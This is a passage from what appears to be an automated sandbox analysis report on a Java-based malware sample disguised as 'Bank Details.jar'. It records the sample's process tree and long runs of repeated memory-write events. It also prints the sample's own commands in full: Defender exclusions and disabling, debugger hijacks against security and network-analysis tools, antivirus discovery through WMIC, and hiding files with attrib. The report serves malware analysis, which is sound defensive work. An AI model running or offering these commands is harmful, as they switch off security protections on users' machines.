to memory of 1804 1584 cmd.exe 188 PID 1584 wrote to memory of 1892 1584 cmd.exe 189 PID 1584 wrote to memory of 1892 1584 cmd.exe 189 PID 1584 wrote to memory of 1892 1584 cmd.exe 189 PID 1156 wrote to memory of 636 1156 java.exe 190 PID 1156 wrote to memory of 636 1156 java.exe 190 PID 1156 wrote to memory of 636 1156 java.exe 190 PID 636 wrote to memory of 1888 636 cmd.exe 191 PID 636 wrote to memory of 1888 636 cmd.exe 191 PID 636 wrote to memory of 1888 636 cmd.exe 191 PID 636 wrote to memory of 1128 636 cmd.exe 192 PID 636 wrote to memory of 1128 636 cmd.exe 192 PID 636 wrote to memory of 1128 636 cmd.exe 192 PID 1156 wrote to memory of 1344 1156 java.exe 193 PID 1156 wrote to memory of 1344 1156 java.exe 193 PID 1156 wrote to memory of 1344 1156 java.exe 193 PID 1344 wrote to memory of 2004 1344 cmd.exe 194 PID 1344 wrote to memory of 2004 1344 cmd.exe 194 PID 1344 wrote to memory of 2004 1344 cmd.exe 194 PID 1156 wrote to memory of 1784 1156 java.exe 195 PID 1156 wrote to memory of 1784 1156 java.exe 195 PID 1156 wrote to memory of 1784 1156 java.exe 195 PID 1344 wrote to memory of 1172 1344 cmd.exe 197 PID 1344 wrote to memory of 1172 1344 cmd.exe 197 PID 1344 wrote to memory of 1172 1344 cmd.exe 197 PID 1156 wrote to memory of 1852 1156 java.exe 198 PID 1156 wrote to memory of 1852 1156 java.exe 198 PID 1156 wrote to memory of 1852 1156 java.exe 198 PID 1852 wrote to memory of 1644 1852 cmd.exe 199 PID 1852 wrote to memory of 1644 1852 cmd.exe 199 PID 1852 wrote to memory of 1644 1852 cmd.exe 199 PID 1852 wrote to memory of 812 1852 cmd.exe 200 PID 1852 wrote to memory of 812 1852 cmd.exe 200 PID 1852 wrote to memory of 812 1852 cmd.exe 200 PID 1156 wrote to memory of 1872 1156 java.exe 201 PID 1156 wrote to memory of 1872 1156 java.exe 201 PID 1156 wrote to memory of 1872 1156 java.exe 201 PID 1872 wrote to memory of 1916 1872 cmd.exe 202 PID 1872 wrote to memory of 1916 1872 cmd.exe 202 PID 1872 wrote to memory of 1916 1872 cmd.exe 202 PID 1872 wrote to memory of 556 1872 cmd.exe 203 PID 1872 wrote to memory of 556 1872 cmd.exe 203 PID 1872 wrote to memory of 556 1872 cmd.exe 203 PID 1156 wrote to memory of 1968 1156 java.exe 204 PID 1156 wrote to memory of 1968 1156 java.exe 204 PID 1156 wrote to memory of 1968 1156 java.exe 204 PID 1968 wrote to memory of 1352 1968 cmd.exe 205 PID 1968 wrote to memory of 1352 1968 cmd.exe 205 PID 1968 wrote to memory of 1352 1968 cmd.exe 205 PID 1968 wrote to memory of 1496 1968 cmd.exe 206 PID 1968 wrote to memory of 1496 1968 cmd.exe 206 PID 1968 wrote to memory of 1496 1968 cmd.exe 206 PID 1156 wrote to memory of 1084 1156 java.exe 207 PID 1156 wrote to memory of 1084 1156 java.exe 207 PID 1156 wrote to memory of 1084 1156 java.exe 207 PID 1084 wrote to memory of 1404 1084 cmd.exe 208 PID 1084 wrote to memory of 1404 1084 cmd.exe 208 PID 1084 wrote to memory of 1404 1084 cmd.exe 208 PID 1084 wrote to memory of 1060 1084 cmd.exe 209 PID 1084 wrote to memory of 1060 1084 cmd.exe 209 PID 1084 wrote to memory of 1060 1084 cmd.exe 209 PID 1156 wrote to memory of 1984 1156 java.exe 210 PID 1156 wrote to memory of 1984 1156 java.exe 210 PID 1156 wrote to memory of 1984 1156 java.exe 210 PID 1984 wrote to memory of 1580 1984 cmd.exe 211 PID 1984 wrote to memory of 1580 1984 cmd.exe 211 PID 1984 wrote to memory of 1580 1984 cmd.exe 211 PID 1156 wrote to memory of 1772 1156 java.exe 212 PID 1156 wrote to memory of 1772 1156 java.exe 212 PID 1156 wrote to memory of 1772 1156 java.exe 212 PID 1984 wrote to memory of 1572 1984 cmd.exe 213 PID 1984 wrote to memory of 1572 1984 cmd.exe 213 PID 1984 wrote to memory of 1572 1984 cmd.exe 213 PID 1156 wrote to memory of 1996 1156 java.exe 215 PID 1156 wrote to memory of 1996 1156 java.exe 215 PID 1156 wrote to memory of 1996 1156 java.exe 215 PID 1996 wrote to memory of 1912 1996 cmd.exe 216 PID 1996 wrote to memory of 1912 1996 cmd.exe 216 PID 1996 wrote to memory of 1912 1996 cmd.exe 216 PID 1996 wrote to memory of 1168 1996 cmd.exe 217 PID 1996 wrote to memory of 1168 1996 cmd.exe 217 PID 1996 wrote to memory of 1168 1996 cmd.exe 217 PID 1156 wrote to memory of 1412 1156 java.exe 218 PID 1156 wrote to memory of 1412 1156 java.exe 218 PID 1156 wrote to memory of 1412 1156 java.exe 218 PID 1412 wrote to memory of 2004 1412 cmd.exe 219 PID 1412 wrote to memory of 2004 1412 cmd.exe 219 PID 1412 wrote to memory of 2004 1412 cmd.exe 219 PID 1412 wrote to memory of 1400 1412 cmd.exe 220 PID 1412 wrote to memory of 1400 1412 cmd.exe 220 PID 1412 wrote to memory of 1400 1412 cmd.exe 220 PID 1156 wrote to memory of 2040 1156 java.exe 221 PID 1156 wrote to memory of 2040 1156 java.exe 221 PID 1156 wrote to memory of 2040 1156 java.exe 221 PID 2040 wrote to memory of 1880 2040 cmd.exe 222 PID 2040 wrote to memory of 1880 2040 cmd.exe 222 PID 2040 wrote to memory of 1880 2040 cmd.exe 222 PID 2040 wrote to memory of 1940 2040 cmd.exe 223 PID 2040 wrote to memory of 1940 2040 cmd.exe 223 PID 2040 wrote to memory of 1940 2040 cmd.exe 223 PID 1156 wrote to memory of 1920 1156 java.exe 224 PID 1156 wrote to memory of 1920 1156 java.exe 224 PID 1156 wrote to memory of 1920 1156 java.exe 224 PID 1920 wrote to memory of 1472 1920 cmd.exe 225 PID 1920 wrote to memory of 1472 1920 cmd.exe 225 PID 1920 wrote to memory of 1472 1920 cmd.exe 225 PID 1920 wrote to memory of 1640 1920 cmd.exe 226 PID 1920 wrote to memory of 1640 1920 cmd.exe 226 PID 1920 wrote to memory of 1640 1920 cmd.exe 226 PID 1156 wrote to memory of 1476 1156 java.exe 227 PID 1156 wrote to memory of 1476 1156 java.exe 227 PID 1156 wrote to memory of 1476 1156 java.exe 227 PID 1476 wrote to memory of 1784 1476 cmd.exe 228 PID 1476 wrote to memory of 1784 1476 cmd.exe 228 PID 1476 wrote to memory of 1784 1476 cmd.exe 228 PID 1476 wrote to memory of 1788 1476 cmd.exe 229 PID 1476 wrote to memory of 1788 1476 cmd.exe 229 PID 1476 wrote to memory of 1788 1476 cmd.exe 229 PID 1156 wrote to memory of 1856 1156 java.exe 230 PID 1156 wrote to memory of 1856 1156 java.exe 230 PID 1156 wrote to memory of 1856 1156 java.exe 230 PID 1856 wrote to memory of 1552 1856 cmd.exe 231 PID 1856 wrote to memory of 1552 1856 cmd.exe 231 PID 1856 wrote to memory of 1552 1856 cmd.exe 231 PID 1856 wrote to memory of 676 1856 cmd.exe 232 PID 1856 wrote to memory of 676 1856 cmd.exe 232 PID 1856 wrote to memory of 676 1856 cmd.exe 232 PID 1156 wrote to memory of 572 1156 java.exe 233 PID 1156 wrote to memory of 572 1156 java.exe 233 PID 1156 wrote to memory of 572 1156 java.exe 233 PID 572 wrote to memory of 1596 572 cmd.exe 234 PID 572 wrote to memory of 1596 572 cmd.exe 234 PID 572 wrote to memory of 1596 572 cmd.exe 234 PID 572 wrote to memory of 1564 572 cmd.exe 235 PID 572 wrote to memory of 1564 572 cmd.exe 235 PID 572 wrote to memory of 1564 572 cmd.exe 235 PID 1156 wrote to memory of 1652 1156 java.exe 236 PID 1156 wrote to memory of 1652 1156 java.exe 236 PID 1156 wrote to memory of 1652 1156 java.exe 236 PID 1652 wrote to memory of 1948 1652 cmd.exe 237 PID 1652 wrote to memory of 1948 1652 cmd.exe 237 PID 1652 wrote to memory of 1948 1652 cmd.exe 237 PID 1652 wrote to memory of 2028 1652 cmd.exe 238 PID 1652 wrote to memory of 2028 1652 cmd.exe 238 PID 1652 wrote to memory of 2028 1652 cmd.exe 238 PID 1156 wrote to memory of 584 1156 java.exe 239 PID 1156 wrote to memory of 584 1156 java.exe 239 PID 1156 wrote to memory of 584 1156 java.exe 239 PID 584 wrote to memory of 1796 584 cmd.exe 240 PID 584 wrote to memory of 1796 584 cmd.exe 240 PID 584 wrote to memory of 1796 584 cmd.exe 240 PID 584 wrote to memory of 580 584 cmd.exe 241 PID 584 wrote to memory of 580 584 cmd.exe 241 PID 584 wrote to memory of 580 584 cmd.exe 241 PID 1156 wrote to memory of 2044 1156 java.exe 242 PID 1156 wrote to memory of 2044 1156 java.exe 242 PID 1156 wrote to memory of 2044 1156 java.exe 242 PID 2044 wrote to memory of 784 2044 cmd.exe 243 PID 2044 wrote to memory of 784 2044 cmd.exe 243 PID 2044 wrote to memory of 784 2044 cmd.exe 243 PID 2044 wrote to memory of 1708 2044 cmd.exe 244 PID 2044 wrote to memory of 1708 2044 cmd.exe 244 PID 2044 wrote to memory of 1708 2044 cmd.exe 244 PID 1156 wrote to memory of 1184 1156 java.exe 245 PID 1156 wrote to memory of 1184 1156 java.exe 245 PID 1156 wrote to memory of 1184 1156 java.exe 245 PID 1184 wrote to memory of 1676 1184 cmd.exe 246 PID 1184 wrote to memory of 1676 1184 cmd.exe 246 PID 1184 wrote to memory of 1676 1184 cmd.exe 246 PID 1184 wrote to memory of 1572 1184 cmd.exe 247 PID 1184 wrote to memory of 1572 1184 cmd.exe 247 PID 1184 wrote to memory of 1572 1184 cmd.exe 247 PID 1156 wrote to memory of 2000 1156 java.exe 248 PID 1156 wrote to memory of 2000 1156 java.exe 248 PID 1156 wrote to memory of 2000 1156 java.exe 248 PID 2000 wrote to memory of 2020 2000 cmd.exe 249 PID 2000 wrote to memory of 2020 2000 cmd.exe 249 PID 2000 wrote to memory of 2020 2000 cmd.exe 249 PID 2000 wrote to memory of 2012 2000 cmd.exe 250 PID 2000 wrote to memory of 2012 2000 cmd.exe 250 PID 2000 wrote to memory of 2012 2000 cmd.exe 250 PID 1156 wrote to memory of 308 1156 java.exe 251 PID 1156 wrote to memory of 308 1156 java.exe 251 PID 1156 wrote to memory of 308 1156 java.exe 251 PID 308 wrote to memory of 1912 308 cmd.exe 252 PID 308 wrote to memory of 1912 308 cmd.exe 252 PID 308 wrote to memory of 1912 308 cmd.exe 252 PID 308 wrote to memory of 864 308 cmd.exe 253 PID 308 wrote to memory of 864 308 cmd.exe 253 PID 308 wrote to memory of 864 308 cmd.exe 253 PID 1156 wrote to memory of 1172 1156 java.exe 254 PID 1156 wrote to memory of 1172 1156 java.exe 254 PID 1156 wrote to memory of 1172 1156 java.exe 254 PID 1172 wrote to memory of 1400 1172 cmd.exe 255 PID 1172 wrote to memory of 1400 1172 cmd.exe 255 PID 1172 wrote to memory of 1400 1172 cmd.exe 255 PID 1172 wrote to memory of 1664 1172 cmd.exe 256 PID 1172 wrote to memory of 1664 1172 cmd.exe 256 PID 1172 wrote to memory of 1664 1172 cmd.exe 256 PID 1156 wrote to memory of 812 1156 java.exe 257 PID 1156 wrote to memory of 812 1156 java.exe 257 PID 1156 wrote to memory of 812 1156 java.exe 257 PID 1156 wrote to memory of 1020 1156 java.exe 259 PID 1156 wrote to memory of 1020 1156 java.exe 259 PID 1156 wrote to memory of 1020 1156 java.exe 259 PID 1020 wrote to memory of 1924 1020 cmd.exe 260 PID 1020 wrote to memory of 1924 1020 cmd.exe 260 PID 1020 wrote to memory of 1924 1020 cmd.exe 260 PID 1020 wrote to memory of 2008 1020 cmd.exe 261 PID 1020 wrote to memory of 2008 1020 cmd.exe 261 PID 1020 wrote to memory of 2008 1020 cmd.exe 261 PID 1156 wrote to memory of 1552 1156 java.exe 262 PID 1156 wrote to memory of 1552 1156 java.exe 262 PID 1156 wrote to memory of 1552 1156 java.exe 262 PID 1552 wrote to memory of 1352 1552 cmd.exe 263 PID 1552 wrote to memory of 1352 1552 cmd.exe 263 PID 1552 wrote to memory of 1352 1552 cmd.exe 263 PID 1552 wrote to memory of 1596 1552 cmd.exe 264 PID 1552 wrote to memory of 1596 1552 cmd.exe 264 PID 1552 wrote to memory of 1596 1552 cmd.exe 264 PID 1156 wrote to memory of 628 1156 java.exe 265 PID 1156 wrote to memory of 628 1156 java.exe 265 PID 1156 wrote to memory of 628 1156 java.exe 265 PID 628 wrote to memory of 1060 628 cmd.exe 266 PID 628 wrote to memory of 1060 628 cmd.exe 266 PID 628 wrote to memory of 1060 628 cmd.exe 266 PID 628 wrote to memory of 2028 628 cmd.exe 267 PID 628 wrote to memory of 2028 628 cmd.exe 267 PID 628 wrote to memory of 2028 628 cmd.exe 267 PID 1156 wrote to memory of 1900 1156 java.exe 268 PID 1156 wrote to memory of 1900 1156 java.exe 268 PID 1156 wrote to memory of 1900 1156 java.exe 268 PID 1900 wrote to memory of 1180 1900 cmd.exe 269 PID 1900 wrote to memory of 1180 1900 cmd.exe 269 PID 1900 wrote to memory of 1180 1900 cmd.exe 269 PID 1900 wrote to memory of 360 1900 cmd.exe 270 PID 1900 wrote to memory of 360 1900 cmd.exe 270 PID 1900 wrote to memory of 360 1900 cmd.exe 270 PID 1156 wrote to memory of 784 1156 java.exe 271 PID 1156 wrote to memory of 784 1156 java.exe 271 PID 1156 wrote to memory of 784 1156 java.exe 271 PID 784 wrote to memory of 1956 784 cmd.exe 272 PID 784 wrote to memory of 1956 784 cmd.exe 272 PID 784 wrote to memory of 1956 784 cmd.exe 272 PID 784 wrote to memory of 1972 784 cmd.exe 273 PID 784 wrote to memory of 1972 784 cmd.exe 273 PID 784 wrote to memory of 1972 784 cmd.exe 273 PID 1156 wrote to memory of 1572 1156 java.exe 274 PID 1156 wrote to memory of 1572 1156 java.exe 274 PID 1156 wrote to memory of 1572 1156 java.exe 274 PID 1572 wrote to memory of 1904 1572 cmd.exe 275 PID 1572 wrote to memory of 1904 1572 cmd.exe 275 PID 1572 wrote to memory of 1904 1572 cmd.exe 275 PID 1572 wrote to memory of 1772 1572 cmd.exe 276 PID 1572 wrote to memory of 1772 1572 cmd.exe 276 PID 1572 wrote to memory of 1772 1572 cmd.exe 276 PID 1156 wrote to memory of 1168 1156 java.exe 277 PID 1156 wrote to memory of 1168 1156 java.exe 277 PID 1156 wrote to memory of 1168 1156 java.exe 277 PID 1168 wrote to memory of 1912 1168 cmd.exe 278 PID 1168 wrote to memory of 1912 1168 cmd.exe 278 PID 1168 wrote to memory of 1912 1168 cmd.exe 278 PID 1168 wrote to memory of 1132 1168 cmd.exe 279 PID 1168 wrote to memory of 1132 1168 cmd.exe 279 PID 1168 wrote to memory of 1132 1168 cmd.exe 279 PID 1156 wrote to memory of 1880 1156 java.exe 280 PID 1156 wrote to memory of 1880 1156 java.exe 280 PID 1156 wrote to memory of 1880 1156 java.exe 280 PID 1880 wrote to memory of 756 1880 cmd.exe 281 PID 1880 wrote to memory of 756 1880 cmd.exe 281 PID 1880 wrote to memory of 756 1880 cmd.exe 281 PID 1880 wrote to memory of 1876 1880 cmd.exe 282 PID 1880 wrote to memory of 1876 1880 cmd.exe 282 PID 1880 wrote to memory of 1876 1880 cmd.exe 282 PID 1156 wrote to memory of 1364 1156 java.exe 283 PID 1156 wrote to memory of 1364 1156 java.exe 283 PID 1156 wrote to memory of 1364 1156 java.exe 283 PID 1364 wrote to memory of 1864 1364 cmd.exe 284 PID 1364 wrote to memory of 1864 1364 cmd.exe 284 PID 1364 wrote to memory of 1864 1364 cmd.exe 284 PID 1364 wrote to memory of 1036 1364 cmd.exe 285 PID 1364 wrote to memory of 1036 1364 cmd.exe 285 PID 1364 wrote to memory of 1036 1364 cmd.exe 285 PID 1156 wrote to memory of 1968 1156 java.exe 286 PID 1156 wrote to memory of 1968 1156 java.exe 286 PID 1156 wrote to memory of 1968 1156 java.exe 286 PID 1968 wrote to memory of 692 1968 cmd.exe 287 PID 1968 wrote to memory of 692 1968 cmd.exe 287 PID 1968 wrote to memory of 692 1968 cmd.exe 287 PID 1968 wrote to memory of 1872 1968 cmd.exe 288 PID 1968 wrote to memory of 1872 1968 cmd.exe 288 PID 1968 wrote to memory of 1872 1968 cmd.exe 288 PID 1156 wrote to memory of 1944 1156 java.exe 289 PID 1156 wrote to memory of 1944 1156 java.exe 289 PID 1156 wrote to memory of 1944 1156 java.exe 289 PID 1944 wrote to memory of 1920 1944 cmd.exe 290 PID 1944 wrote to memory of 1920 1944 cmd.exe 290 PID 1944 wrote to memory of 1920 1944 cmd.exe 290 PID 1944 wrote to memory of 1452 1944 cmd.exe 291 PID 1944 wrote to memory of 1452 1944 cmd.exe 291 PID 1944 wrote to memory of 1452 1944 cmd.exe 291 PID 1156 wrote to memory of 2040 1156 java.exe 292 PID 1156 wrote to memory of 2040 1156 java.exe 292 PID 1156 wrote to memory of 2040 1156 java.exe 292 PID 2040 wrote to memory of 1908 2040 cmd.exe 293 PID 2040 wrote to memory of 1908 2040 cmd.exe 293 PID 2040 wrote to memory of 1908 2040 cmd.exe 293 PID 2040 wrote to memory of 584 2040 cmd.exe 294 PID 2040 wrote to memory of 584 2040 cmd.exe 294 PID 2040 wrote to memory of 584 2040 cmd.exe 294 PID 1156 wrote to memory of 2004 1156 java.exe 295 PID 1156 wrote to memory of 2004 1156 java.exe 295 PID 1156 wrote to memory of 2004 1156 java.exe 295 PID 2004 wrote to memory of 308 2004 cmd.exe 296 PID 2004 wrote to memory of 308 2004 cmd.exe 296 PID 2004 wrote to memory of 308 2004 cmd.exe 296 PID 2004 wrote to memory of 1468 2004 cmd.exe 297 PID 2004 wrote to memory of 1468 2004 cmd.exe 297 PID 2004 wrote to memory of 1468 2004 cmd.exe 297 PID 1156 wrote to memory of 572 1156 java.exe 298 PID 1156 wrote to memory of 572 1156 java.exe 298 PID 1156 wrote to memory of 572 1156 java.exe 298 PID 572 wrote to memory of 1888 572 cmd.exe 299 PID 572 wrote to memory of 1888 572 cmd.exe 299 PID 572 wrote to memory of 1888 572 cmd.exe 299 PID 572 wrote to memory of 556 572 cmd.exe 300 PID 572 wrote to memory of 556 572 cmd.exe 300 PID 572 wrote to memory of 556 572 cmd.exe 300 PID 1156 wrote to memory of 2008 1156 java.exe 301 PID 1156 wrote to memory of 2008 1156 java.exe 301 PID 1156 wrote to memory of 2008 1156 java.exe 301 PID 2008 wrote to memory of 1952 2008 cmd.exe 302 PID 2008 wrote to memory of 1952 2008 cmd.exe 302 PID 2008 wrote to memory of 1952 2008 cmd.exe 302 PID 2008 wrote to memory of 1940 2008 cmd.exe 303 PID 2008 wrote to memory of 1940 2008 cmd.exe 303 PID 2008 wrote to memory of 1940 2008 cmd.exe 303 PID 1156 wrote to memory of 1932 1156 java.exe 304 PID 1156 wrote to memory of 1932 1156 java.exe 304 PID 1156 wrote to memory of 1932 1156 java.exe 304 PID 1156 wrote to memory of 1384 1156 java.exe 306 PID 1156 wrote to memory of 1384 1156 java.exe 306 PID 1156 wrote to memory of 1384 1156 java.exe 306 PID 1156 wrote to memory of 2016 1156 java.exe 308 PID 1156 wrote to memory of 2016 1156 java.exe 308 PID 1156 wrote to memory of 2016 1156 java.exe 308 PID 1156 wrote to memory of 1628 1156 java.exe 310 PID 1156 wrote to memory of 1628 1156 java.exe 310 PID 1156 wrote to memory of 1628 1156 java.exe 310 PID 1156 wrote to memory of 1876 1156 java.exe 312 PID 1156 wrote to memory of 1876 1156 java.exe 312 PID 1156 wrote to memory of 1876 1156 java.exe 312 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1348 attrib.exe 2008 attrib.exe 1860 attrib.exe 1844 attrib.exe 1776 attrib.exe 1672 attrib.exe 1580 attrib.exe 2004 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Bank Details.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1788
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:2004
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1348
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2008
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1860
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1844
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1776
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1672
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class2⤵
- Views/modifies file attributes
PID:1580
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1344
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1184
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2024
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2028
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1412
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1496
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1636
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1660
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1060
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:692
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:812
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1804
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1968
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1992
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1856
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1576
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:676
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1920
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:756
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1344
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2020
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1440
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1964
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1504
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1892
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1084
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1776
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:2012
-
-
-
